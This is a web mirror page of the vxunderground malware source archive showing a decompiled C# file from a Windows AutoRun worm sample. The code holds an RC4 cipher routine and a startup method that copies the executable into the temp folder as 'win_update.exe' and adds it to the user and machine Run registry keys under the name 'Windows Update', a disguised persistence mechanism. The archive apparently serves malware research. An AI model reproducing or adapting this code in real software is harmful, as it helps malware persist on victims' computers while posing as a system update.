ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/rc4.cs

116 lines
3.7 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.rc4
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Text;
using System.Threading;
namespace BCV5StuB
{
internal class rc4
{
[DebuggerNonUserCode]
public rc4()
{
}
public static string rc4(string message, string password)
{
int index1 = 0;
int index2 = 0;
StringBuilder stringBuilder = new StringBuilder();
string empty = string.Empty;
int[] numArray1 = new int[257];
int[] numArray2 = new int[257];
int length = password.Length;
int location1 = 0;
while (location1 <= (int) byte.MaxValue)
{
char String = password.Substring(location1 % length, 1).ToCharArray()[0];
numArray2[location1] = Strings.Asc(String);
numArray1[location1] = location1;
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
int index3 = 0;
int location2 = 0;
while (location2 <= (int) byte.MaxValue)
{
index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256;
int num = numArray1[location2];
numArray1[location2] = numArray1[index3];
numArray1[index3] = num;
Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1));
}
location1 = 1;
while (location1 <= message.Length)
{
index1 = checked (index1 + 1) % 256;
index2 = checked (index2 + numArray1[index1]) % 256;
int num1 = numArray1[index1];
numArray1[index1] = numArray1[index2];
numArray1[index2] = num1;
int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256];
int CharCode = Strings.Asc(message.Substring(checked (location1 - 1), 1).ToCharArray()[0]) ^ num2;
stringBuilder.Append(Strings.Chr(CharCode));
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
string str = stringBuilder.ToString();
stringBuilder.Length = 0;
return str;
}
public static object Startup()
{
try
{
if (!File.Exists(Path.GetTempPath() + "win_update.exe"))
File.Copy(Assembly.GetExecutingAssembly().Location, Path.GetTempPath() + "win_update.exe");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("Windows Update", (object) (Path.GetTempPath() + "win_update.exe"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("Windows Update", (object) (Path.GetTempPath() + "win_update.exe"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
public static object Antis()
{
object obj;
return obj;
}
}
}
Reference in New Issue Copy Permalink